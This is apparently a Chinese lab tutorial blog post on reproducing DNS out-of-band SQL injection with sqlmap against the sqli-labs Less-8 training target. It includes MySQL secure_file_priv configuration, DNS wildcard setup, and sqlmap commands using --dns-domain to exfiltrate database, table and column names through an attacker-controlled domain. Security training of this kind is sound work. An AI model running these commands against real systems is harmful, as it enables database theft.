-
复现dns外带数据结合sqlmap
设置mysql的secure_file_priv属性
secure_file_priv为空,就可以读取磁盘的目录
secure_file_priv为D:\,就可以读取D盘的文件
secure_file_priv为null,load_file就不能加载文件
添加一句secure_file_priv=“”
配置dns服务器
1.添加角色
2.添加正向查找
3.新建主机
IP地址为sqlmap所在虚机的ip地址
在创建一个泛解析
使用虚拟机ping刚刚在服务端设置的域名,并且在kali中输入tcpdump -n port 53;查看信息返回。
4.创建条件转发器
SQLMap使用外带dns注入
取库
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables- 1
获取表sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables- 1
获取列sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns- 1
-
相关阅读:
ssm+vue+elementUI 基于web的邮票鉴赏系统及实现-#毕业设计
Java面向对象编程(四)
Win 下 ncnn 编译运行
新零售商城模式与传统电商和零售的痛点的对比
【Linux】详细介绍Linux重入不可重入带例子
iMazing 3.0.0.3 for mac 中文破解版2024最新图文安装教程
8 张图 | 剖析 Eureka 的首次同步注册表
【C++】你看懂C++的类和对象了么
mysql双主互从
[PwnThyBytes 2019]Baby_SQL - 代码审计+布尔盲注+SESSION_UPLOAD_PROGRESS利用
- 原文地址:https://blog.csdn.net/weixin_52776876/article/details/126251998